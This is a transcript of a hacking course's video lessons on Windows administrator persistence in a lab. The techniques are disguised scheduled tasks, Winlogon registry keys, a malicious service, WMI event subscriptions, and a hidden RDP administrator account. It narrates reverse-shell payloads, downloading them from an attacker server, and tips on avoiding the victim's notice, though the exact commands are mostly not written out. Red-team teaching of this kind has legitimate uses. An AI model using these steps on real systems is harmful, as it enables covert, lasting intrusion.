level, which we do have, and this technique is used by everyone. And down here it says we receive our shell as high mandatory level, so this is good. Alright, so these commands above right here, they add our binary and also confirm is it done. So let's go ahead and copy the command on top. And they say the scheduled task Adobe Flash Sync has successfully been created. Let's go ahead and confirm by running the command below. As you can see, it is right here. This is the host name, the name of this machine, and the task name is Adobe Flash Sync. Status it is ready, and logon mode is interactive only. Alright, let's go ahead and query the information of the scheduled task we created into .xml format by running this command. So this is the information or a configuration of the scheduled task we created. Why are we doing this? Because we need to store this content on a file, then we modify somewhere, because if we don't modify this file, we will receive our shell as a low level user without high privileges or running as a high integrity level. So we need to modify this file. On a productive system or whatsoever, you will have to transfer this file back to your Kali Linux, then you modify it, then you transfer it back to your target system. But for us, we'll just go ahead and transfer it in our Windows 11 target system. Alright, so let's go ahead and redirect the output to a file we can call task.xml file, just like this, and we hit enter. Alright, if we say dir, we can see we do have task.xml file, and it is in 1.193 kilobyte size. Alright, now let's come back to our Windows 11 device right here. We can see the task.xml file right here with the icon of Microsoft Edge browser. Let's go ahead and right click. Alright, we don't have to right click and edit in Notepad, because this file belongs to an administrator user, not just a regular user. So what we should do, come back on our Kali and say Notepad. This shell is running as administrator, so the task.xml file belongs to us, so this is what we do to be able to view it or edit it. If we come back, task manager should pop up right here. So here it is. All right, now I want you to pay attention and listen carefully. We need to create a section right here on logon type and principal, just between. I need you to create some space and hit tab just like this. Now come back to your .txt file of scheduled task technique, and I need you to copy this one that says run level highest available and run level whatsoever. Copy this these strings, paste them right here. Go ahead and hit Ctrl S to save this file, then go ahead and close it. All right, nice. Let's come back to our Kali, and if we say dir again, we can see the file did change from 1.193 to 1.199. Seems like we did modify it successfully. Wonderful. Let's clear the screen, come back right here. All right, now what we are going to do is we are going to delete the task we created. Let's go ahead and copy the command and delete it. It says the scheduled task Adobe Flash Sync was successfully deleted. Then we are going to recreate it with the configuration we created, which is task.xml file. So this configuration carries the path to our binary, and also it will go ahead and run with the highest privilege available, as we said in this configuration file. So now we are creating our scheduled task with this configuration file we modified. Let's go ahead and hit enter. All right, nice. It seems like it did complete. Say the scheduled task Adobe Flash Sync has successfully been created. Now it says delete task and recreate the task with the configuration, which is what we did. Now always leave your handler on. Whenever the target reboot or login as you always get your shell. Okay, we can run it manually by running this command or whatsoever. So let's go ahead and cancel this session. Run the listener again on port 53. Let's go ahead and sign out. Let's go ahead and sign back in. Control Alt to get our mouse out of this virtual machine, and we can see we do have a shell right here. It has come back. Now let's go ahead and say who am I. We are just user, I believe. Okay, let's let it run the command. It's hanging because the system is starting up. We are just user /all to query the information as who we are. We are running as high mandatory level, and this is all the privileges we do have. Wonderful. We have persistent as an administrator, and we do receive a high integrity level session. This is nice. All right, my friends, so this is it for this video. But before we move on, let's all remember that we need to clear up what we did. Let's come back right here, and this is running it manually. You can go ahead and try if you need to do so, but we can remove it by running this command. Now it says the scheduled task Adobe Flash Sync was successfully deleted. Wonderful. All right, my friends, so this is it for this video. I'll be seeing you in the next one. Bye bye. Don't take too long. I'm waiting for you. Hey, what's up my friend? Welcome to the second technique of persisting as an administrator user. Let's go ahead and open up our resources folder. Let's go ahead and open multi-action scheduled task.txt file. All right, it says on top the technique is multi-action scheduled task, and needed privileges is admin or high integrity level, which we do have, and it says this technique is used by the cyber gophers, which is us. All right, down here it says we receive shell as high mandatory level. All right, this is cool. Let's go ahead and run the command on top right here to query information about this scheduled task that exists on every Windows system by default. As you can see, the task to run, this is the name of the task or whatsoever, and the status, it says it is ready, and the logon mode, it says interactive or background, and task to run, it says com handler, the other Microsoft Corporation or whatsoever. So the command, it says this task initiates synchronization of work folders partnerships when a user logs on to the system. Okay, the scheduled task state, it is saying enabled. All right, cool. Now we have some information about this scheduled task. Let's go ahead and come back right here. Let's copy this command. I'll clear the screen, paste the command. All right, so now what we are doing, we are querying the information of this scheduled task into .xml format, and we output that .xml format into task.xml file. Let's go ahead and hit enter, and if we say dir, we can see now we do have the configuration of this scheduled task in the task.xml format. All right, cool. Let's come back right here, and we do have this command right here. This command will go ahead and create a backup of this task.xml format. So now if we say dir, we can see we have task2.xml. Why we are doing this? Because we are going to delete this default task right here and recreate it with the configuration file we are going to create. So we are creating a backup because when we clean up, we'll need to set it back what it was. So we'll have to set back the scheduled task with this configuration, which was the default one. So we are going to modify this one and recreate the scheduled task with our configuration we have modified. So later on, when we are cleaning up, we will recreate the scheduled task with the original task configuration. I think you get the picture. So let's go ahead and clear the screen, and I need you to say notepad task2.xml to open the task2.xml format. In a real environment, I already told you, you have to move this file on your Linux, then you modify it and you move it back to your target system. But this is for educational purposes. We are just modifying it right here. All right, so I need you to come back right here, and I need you to copy this content, and I need you to paste it right here on principal ID interactive user. You go ahead and create some space for your command and you paste it right here. As you can see, just between right here, line level, highest available, just like this. All right, cool. Let's scroll down a bit, and I need you to come back on your scheduled task.txt file, and I need you to copy this content just like this. Just be careful when you are doing your things, don't crash or mess up anything. I need you to paste what you have copied between com handler and actions. You go ahead and create some space just like this, and you go ahead and paste it just like this. All right, we are not done because our configuration will go ahead and show an error. I need you to modify it properly just like this. Remove it like this. All right, just like this. We have put the path to our winlogon.executable binary. Wonderful. Let's go ahead and hit Ctrl S to save this file, and we close it. Nice. Come back to Kali, and I need you to come back right here. All right, so now we are going to delete the default scheduled task that runs on Logon, whatever we saw. We are going to delete it. Okay, the scheduled task was successfully deleted, and now we come back and copy this command. This command will go ahead and recreate that scheduled task into using our task2.xml. And I think, as you remember before, it was saying com handler. You see somewhere a change. Let's go ahead and hit enter, and it says the scheduled task, and this is the name, has been successfully created. Okay, let's go ahead and query the information of the scheduled task now. I'll clear the screen, and as you can see, something did change right here. The task to run was com handler. Now it says multiple actions. So what it is going to do, it is going to just do what it was told to do, what it was intended to do, by initiating the synchronization of work folders partnership when a user logs on to the system, and also run our binary. That's why it says it's not only com handler but multiple actions now. All right, wonderful. Let's come back right here. It says setting up our configure whatsoever. So this command right here, it says running it manually because it takes 5 minutes to launch after a sign in. Okay, So when a user logs in into their system, it gets 5 minutes before this task is run, before our payload is run. So let's go ahead and run it manually first to see if we did it properly. I'll go ahead and paste the command. Before I run it, I'll create a write tab and set up another listener on port 53, and then I'll go ahead and hit enter. And as you can see, we do have a shell right here. Let's go ahead and say who am I. We're just user, but if we say who am I /o, this is all the privileges we do have, and we are running as high mandatory level. Nice. So our persistent is working very fine as intended, but now we need the POC, the proof of concept, that our scheduled task will run like in 5 minutes as they said. Let's go ahead and cancel this shell and run our listener again. Okay, something to my network, the Wi-Fi is back, I was offline. Okay, all right, cool, it's okay. I'll come back right here on my Windows 11 device and I'll sign out. Our listener is ready. All right, after signing out, let's go ahead and sign back in. Hit Control Out to take your mouse out of this virtual machine, and we come back right here waiting for shell. So what am I gonna do is I'm gonna open clock, and we choose the stopwatch and we run it. So in exactly 5 minutes, our executable binary should be executed as they say. So let's go ahead and wait for some minutes. So I'm going to pause the video and pause around 4 minutes or 5 minutes, and we'll see us catching the shell live on session. So let me go ahead and pause the video. The machine is up and running, but they say it usually takes 5 minutes. So let's go ahead and leave it for 5 minutes and we'll be back. So I'm going to pause the video, my friend, and unpause once the timer is passed it 4 minutes or 5 minutes. Bye bye, I'll see you in a second. All right, I am back around 4 minutes and 43 seconds, and as we can see, the shell just catch up. Wonderful. Let's go ahead and say WMI /o. All right, this is all the privileges we do have, and it is saying we are running as high mandatory level. Wonderful. So we have persisted the correct way we needed. All right, my friends, so this is it for this video, but we all know before we move on, let's go ahead and clear what we have done. All right, so this is deleting the scheduled task. Okay, it was deleted successfully. Let's go ahead and copy the command to recreate it with the configuration file we backuped that time. So we need to be in the C drive program folder, because that's where the backup file is. Program data folder dir, and here is, okay, I'm sorry about that, my mouse just disconnected. I'm not able to use it. Let me use the mouse on my laptop. All right, so as you can see, this is the backup file we have created. So I'll go ahead and hit Control V to paste. The V doesn't work. Let me pause the video for a second and fix my main mouse. Okay, cool. I am back. So this is the backup task.xml format file we have created back then. So we'll go ahead and recreate the task we deleted with that original file. Okay, cool. If we come back right here and query the scheduled task again, we can see that it did change from multiple action to COM handler. So we have set it back to what it was before. Nice, wonderful. So this is it for this video, my friend. Bye bye, I'll be seeing you in the next one. No time to waste, my friend. Let's go ahead and open up our resources folder, admin level persistence folder. I need you to open Winlogon registry shell key.txt file. Alright, so top right here it says the technique is Winlogon registry shell, and needed privileges is admin or high integrity level, and this technique is used by the Gaza or Tula or Tropic Trooper APT groups. And down here it says we receive our shell as a regular user, so let's keep that in mind even though we are running with admin privileges. Alright, so let's go ahead and run this command right here, and it says down here for now it should just say explorer.executable. As you can see, explorer.executable. And let's go ahead and run this command right here to copy our winlogon.executable binary to the C Windows System 32 folder, because it says our malicious binary needs to be in System 32 folder. If we hit enter, we can see that it tells us to overwrite because this winlogon.executable binary exists in the C drive Windows System 32 folder, because Windows by its default it does have this binary. So if we override this binary, we'll create a misconfiguration or a stability in this system. So let's not go ahead and do so by saying no, and we'll go ahead and change right here to copy our winlogon.executable binary in the System 32 folder as winlogon2.executable, just like this, and we hit enter. Let's keep that in mind. We have named our binary winlogon2.executable. Now it tells us to add our binary to be executed also by running this command on top. I'll clear the screen. Now, as you can see, before we run this command, let's go ahead and make sure that our binary is merged winlogon32.executable. Then we hit enter. Wonderful. Before we go on, let's go ahead and query to make sure that our binary is also there. And as we can see, now it says explorer.executable and winlogon2.executable. So our binary does exist in this registry key. Alright, so now I think we should set up a listener and sign out and sign in and see if we get our shell as a regular user. So let's go ahead and cancel this session, clear the screen, run the listener again, come back to our Windows 11 target system, sign out. No shell yet right here. Let's come back right here. Let's go ahead and sign in. I'll go ahead and hit Control Out to take my mouse out of this virtual machine and come back right here. And as we can see, we do have a shell in this system. Let's go ahead and say who am I. We are just regular user. And if we say who am I/O, we are just regular user running in medium mandatory level, and this is all the privileges we do have. So this is how you persist as an administrator by using this registry key, but you receive your shell as a small user. Alright, so before we move on, let's go ahead and clear what we have done. Let's go ahead and copy this command to set up back what we have done. And it says access denied because this shell is running as a small user. So let's go ahead and cancel it, clear the screen, run the listener again, come back right here in our C drive program data and run our malicious binary as an administrator to clear up what we have done. Copy this command, delete the key we created. As you can see, it says the operation completed successfully, and if we use the up arrows to query, we can see that it did turn to Explorer only. Now we can also go ahead and delete our malicious binary, which is winlogon2.executable, and wonderful, we have deleted it. Alright my friends, so this is it for this video. I'll be seeing you in the next one. Bye bye. No time to waste. We all know that. Let's go ahead and open up our resources folder. I need you to open Winlogon registry Userinit key. On top, the technique is called Winlogon registry Userinit. And needed privileges is admin or high integrity level to set up this persistent. And this technique is used by the Gaza, Tula, or Tropic yeah, Tropic Trooper APT groups. And down here it says we receive shell as a regular user. All right, let's go ahead and query the information, and it says we see only full path of Userinit. Let's go ahead and copy this command. All right, as they said, we are seeing the full path of the Userinit binary. And now copy our malicious binary to the system32 folder. We all know that this binary already exists, so we just rename it to Winlogon 2 .executable. Okay, it was copied. And now let's go ahead and copy this command, which is adding our binary to be also executed. Let's paste it right here, and we should modify it from winlogon.executable to winlogon2.executable and hit enter, and the operation completed successfully. Alright, now we should also see the full path to our binary too. Let's go ahead and query the information of this registry key, and as you can see, we have userinit.executable and also winlogon2.executable full paths on this registry key. And yeah, that's it. Let's go ahead and cancel this session, clear the screen, run the listener again, come back to the Windows target system, and this is the user signing out or rebooting their system and log back in. That's what we are mimicking right here. All right, so this is the target signing in to their system. Let's go ahead and press Ctrl Alt to take out our mouse of this virtual machine and come back to our Kali. And as we can see, we do have a shell in this system. Let's go ahead and say who am I. We are running as a small user, who am I/O. We are running in the medium mandatory level, and this is the privileges we do have. All right, wonderful. So before we move on, before we close down this learning unit, let's go ahead and reset what we have done. Let's go ahead and copy this command. Obviously, we can't do it because our session is running as a small user. Let's go ahead and cancel it, clear the screen, rerun the listener, come back to the Windows 11 target system. Let's run our binary again as an administrator. Now let's come back right here to copy the command, paste it right here, then we hit enter. Now let's go ahead and query the information to see are we done. We can see that it did change back to userinit.executable binary. Now let's come back right here and also copy the command to delete our Winlogon binary, which we named winlogon2.executable. Wonderful, we have cleared up what we have done. All right, nice. So this is it for this video, my friend. Bye bye. I'll be seeing you in the next one. Welcome back, my friend. Let's not waste any time. Let's go ahead and open up our resources folder, and I need you to open modified services.txt file. Alright, so the technique is called modified services, and needed privileges to set it up is admin or high integrity level, and the technique is used by everyone. And down here they say we receive our shell as NT authority system. Alright, so these commands up here, they say they generate a service payload. So after we have generated this service payload, we should transfer it to the target system. So let's go ahead and copy the command. For me, I'm going to copy this one on top. You can go ahead and copy this one on bottom. I'll come back to my Kali, create another tab in the opt dev folder. I'll go ahead and paste and I'll run the command. So I'm going to generate winlogon_service.executable binary, and the listening host is going to be my IP address. So I just put the network adapter name, so it will go ahead and automatically assign my IP address. Alright, so our binary has been generated. Let's go ahead and spin up a simple Python web server so we can transfer it to the target system. I'm going to spin it up on port 80. Come back to Kali. If we say dir, we can see we just have winlogon.executable. Let me clear the screen. Now let's say PowerShell -c to execute everything that comes afterwards. And let's say invoke web request HTTP on 10.10.10, which is our IP address, Winlogon underscore service, which is the binary we need to grab .executable. And let's go ahead and output it as Winlogon underscore service .executable. Let's go ahead and hit enter. And now let's come back to our simple Python web server. We can see that someone did come and grab the Winlogon underscore service.executable binary and 200, which means successfully. So now we should be able to see the binary. It does exist right here, Winlogon underscore service.executable. Wonderful. Let me clear the screen. Let's come back right here. Alright, so let's go ahead and copy this command to create a service, and then we run this command right here to confirm is it done. So this command is going to create a service called update service, and this is the binary path name to our malicious binary, and start is go to automatic. Let's go ahead and hit enter, and they say create service success. Let's go ahead and say SC, which is service QC, to query the information about update service. And as you can see, type 10 Win32 on process, start type automatic start, and error control 1 normal. And this is the binary path right here, and the display name is update service, and the service start name, it is going to be run as local system. Wonderful. So now we can go ahead and sign out. By sign out, it will not work. Restarting the system will work. Yeah, because you know this is a service. Let's keep that in mind. Services, doesn't matter if you sign out, they'll just keep running or whatsoever. So let's say, let's give an example of a service that handles time on a system. It doesn't matter if you sign out your system and sign back in, that service will always keep running because it maintains time on your system, so it doesn't need to stop or whatsoever. So we need to restart our target system. That's where it will work. So right here we can run it manually or whatsoever, but for us, let's go ahead and cancel this session. We have run the listen again. Let's come back right here. You can go ahead and restart the target system. So this is the target, restarting their system or whatsoever, rebooting or power meeting on. Before diving into the next persistent technique, which is WMI Event Subscription, let's take a moment to talk about what exactly is it. So, WMI Event Subscription is a feature in Windows that allows you to create event-driven scripts or automating tasks based on the events generated by the WMI providers. For example, at Logon, process creation, registry actions, file activity, disk space thresholds, and many more. WMI events comes in two flavors: a local single process context or a permanent WMI event subscription. The permanent subscriptions are stored in the WMI repository, and they persist across system shutdowns or reboots. And the nice sweet part to note is they run with system level privileges. So that's what we are going to target. So to create a permanent WMI event subscription, we have to define three things, which are filter to consumer binding, which links the event filter with the event consumer and also specifies the relationship between what events triggers the action defined in the consumer. Next, we have the event filter, which defines the criteria that determines which events trigger the subscription. And lastly, we have the event consumer, which specifies the action or a script to execute when the event occurs. Alright, I think now we do have the clear picture in what we are going to deal with. So meet me in the next module. Then we set this type of persistence up. I'll be seeing you in the next learning unit. Now let's go ahead and open up our resources folder, and I need you to open WMI Event Subscription.txt file. Alright, the technique is called WMI Event Subscription. Needed privileges, admin or high integrity level, which we do have, and this technique is used by the Stacknet, APT29, Tula, and CDoc APT groups. And down here it says we receive shell as NT authority system. Alright, so these commands above right here, they're going to query some information about filter to consumer binding, event consumer, or event filter. So we can just go ahead and run them. Let me clear the screen. Alright, this is the information we have on the event filter. And this is the information we have on the event consumer. And lastly, on the filter to consumer binding. Alright, cool. Let's go ahead and clear the screen. We need to keep it straight and simple. Alright, so these commands right here, they set up our persistent as they say right here. So let's go ahead and copy the first command. Let's come right here and paste it. And this command is going to create an event namespace or event filter, or create a name or whatsoever. So we have put the msh.executable binary. So whenever the targets launches this msh.executable, which is the Microsoft Edge browser on their system, it will also go ahead and run our payload, which is going to be just our binary that will connect back to us. So you can use any application you want. You can choose CMD or whatever, explorer.executable or whatever you want. You go ahead and do so, but on this lesson we are going to use Microsoft Edge browser. Let's go ahead and hit enter, and instant creation successfully. Alright, let's go ahead and copy the next command. The next command, it is going to give the path to the binary we need to run, which can just be a task or a script to execute or whatsoever. But for us, it is just the path to our winlogon.executable binary that will go ahead and connect back to us. Let's go ahead and hit enter. Instance creation successfully. And let's go ahead and run the last command right here. And they say instance creation successfully. Wonderful. Now we can go ahead and kill this session we have right here, because the persistent has been set up successfully. And let's come back to our Windows 11 device. Even if we restart, our persistent won't just trigger itself or whatsoever, because we have told it that it should launch our event whenever the user or whatever using this system launches Microsoft Edge browser. That's where we will receive our shell right here. So let's go ahead and open up Microsoft Edge browser. Okay, I just opened it up and everything looks fine, nothing suspicious or whatsoever. The browser is loading perfectly fine. Okay, now let's come back to our listener on Kali and check if we do have a session, and looks like we do. Let's go ahead and say who am I. As you can see, we are NT authority system. You can say who am I /all. This is all the privileges we do have, which means all access on the system, and we are running a system mandatory level. This is nice. Let me go ahead and cancel. I need to make sure that we really did it. I'll close the Microsoft Edge browser. It is being closed and the listener is on. Let's go ahead and launch the Microsoft Edge browser. Okay, it did pop up. Let's come back to our listener. We can see we do have access. NT authority system. Wonderful. All right, my friends, so this is it for this video. Bye bye. I'll be seeing you in the next lesson. I'll be waiting for you. Bye bye. I'm sorry about that. I just edited this video. I forgot to clear what we have done. Let's just go ahead and clear it by running these commands down here. Okay, deleting instance successfully. And successfully. All right, wonderful. So bye bye for you this time, my friend. I'll be seeing you in the next learning unit. All right, my friend, we all know the drill. Let's go ahead and open up our resources folder, and I need you to open the hidden user RDP Access.txt file. Alright, the technique is called hidden user with RDP access. A needed privilege is to set this type of persistent app is admin or high integrity level. Let's go ahead and say WMI /O. On this system, we are logged in as user and we are running with high mandatory level, and this is all the privileges we do have. Wonderful. We are able to set this type of persistent app. And this technique is used by the cyber golfers, which is us. We favor this technique. Alright, down here it is saying creating a hidden user. Let's go ahead and copy the command on top, paste it right here on our curly. This command is going to create a user called Winlogon service, and we are going to set the password of that user to password 123. Let's copy the command below. I just ran it. This command right here is going to add the user we just created into the administrators group. Let's move on. Copy the command below. This command is going to add the user we just created into the remote desktop users. Alright, now we do have this command right here that is going to interact with the registry hive. But down here in the description, it is saying hiding the user on logon panels. When we say logon panels, let's come right here on our Windows 11 target system where we just created our user called Winlogon, and if we click right here, we can see Winlogon service user is right here. So if we run that command, you wouldn't be able to see any other user right here or whatsoever. The target will just see his username right here. That's all. So let's come back right here on our curly, copy the command to hide the user on logon panels. And one thing to note, that it doesn't just go ahead and hide the user instantly. It may be just take 30 seconds or 1 minute for the system to refresh itself or whatsoever. Later on, we will see that this user will not be available right here. It just take 1 minute and it will disappear. Let's keep that in mind. Alright, let's go ahead and confirm whatever we did is done by copying the net user and the username. I'm sorry, I just pasted something. Let me clear the screen. Alright, you can see our username Winlogon service, and we are in the groups of administrators and remote desktop users. Wonderful. Let's go ahead and clear the screen. Alright, this is for removing the user if we need to remove it later on. But now importantly, let's come right here that is saying enabling RDP. Alright, these commands above right here, it is saying disable this for RDP to work. Alright, let's go ahead and do so. Copy the command. We run it. Come back. Copy the command. Let's run it. Okay. We did disable, and down here we have another command. It is saying setting firewall rules for remote desktop protocol to work properly. Let's go ahead and do so. Okay, it is said okay. Okay. And lastly, we can see okay. Alright, so this is logging in from Kali Linux. This is us trying to log in into that system with the user we just created and the password. So down here in the description, it says connect if you are sure the target is away from the system, because this technique is going to disconnect the target from their computer. or it will notify them someone is trying to connect or whatsoever, so they'll see something going on their PC. So you connect if you are sure that the target is away from their PC. All right, now before we move on, let's go ahead and confirm back on our Windows target system that the Winlogon service user has gone. As you can see, as I told you, it has gone. The system has refreshed its registry hives or whatsoever. All right, cool, we are rolling. All right, let's go ahead and clear the screen, and I need you to create another tab just like this. Now let's come back right here, and we can use X-Free RDP or RDesktop, but I just love RDesktop. Let's go ahead and copy this command and I'll paste it right here. All right, this command is going to utilize RDP to connect on the user Winlogon service, and this is the password 123 and the IP address of our target system. You can come back right here and confirm by running IP config. As you can see, 10.10.10.129. all right, so G or -XC is just the screen of the session we want to receive right here. It doesn't really matter because we can just change it to any size we want. That's why I favor RDesktop than X-Free desktop. Yeah, I guess. Let's go ahead and hit enter. All right, seems like something is going in the background. Okay, nice, we are getting logged in. All right, another user is signed in. If you continue, they'll be disconnected. Do you want to sign in anyways? Obviously, we'll go ahead and click yes. Let's come back right here. Nothing yet on the Windows 11 target system. Let's go ahead and click yes, and please wait for the user to respond. We can come back on our target system. We can see a prompt from our desktop connection. It is saying, do you want to allow this Winlogon service to connect to this machine? Click OK to disconnect your session immediately, or click cancel to stay connected. As you can see, it will pop something in front of the user, so you go ahead and utilize the desktop session if you are sure that the target is away from the system. Then you have your shell. As you can see, 30 seconds has passed. It will go ahead and automatically disconnect the user. And if we come back right here, it is saying welcome on our RDP session. Let's give it a second. It's taking some time because it is configuring the user we just created, configuring the settings or whatsoever, configuring the rules of this user or whatsoever, because this is a new user just going to sign in into a new fresh system. Let's just go ahead and give it some time. All right, as you can see, the RDP session has been established successfully. Now we are able to control the target system right here on our Kali Linux, and we can go ahead and utilize the full screen. This is what I love about RDesktop, because with X-Free RDP utility you won't be able to do so. All right, nice. As we can see, we are able to control this system right here, just like we are in front of it. Nice. The most important thing to note, make sure you utilize your RDP session when you are sure that your target is away from their computer. That's all. All right, let's come back right here on our Windows 11 target system, and you should be able, I encourage you to disconnect before the target comes back, because if they click sign in into their account or whatsoever, they'll see that another user is signed in. If you continue, they'll be disconnected. Do you want to sign in anyway? If they click yes, they'll have to wait for us to respond, and if we click cancel, we won't be allowing them to sign in their system. As you can see, Winlogon service denied your disconnect request. Just like that. Keep that in mind, that your target won't be able to connect back, so you have to disconnect your session when you are done. We can just go ahead and close the session by clicking here, and if the target comes back on their system and click sign in, they'll just get back where they left off. All right, my friends, so this is it for this learning unit. Bye bye. I'll be seeing you in the next one. Whew, you made it. We've been together for quite some time, and I want you to know that I did enjoy this journey of teaching in this course, and I do hope you did learn something new or something valuable from this course. So this is it, my cyber harbinger. Our journey ends here. I hope to meet you in the next one. Farewell, awesome friend.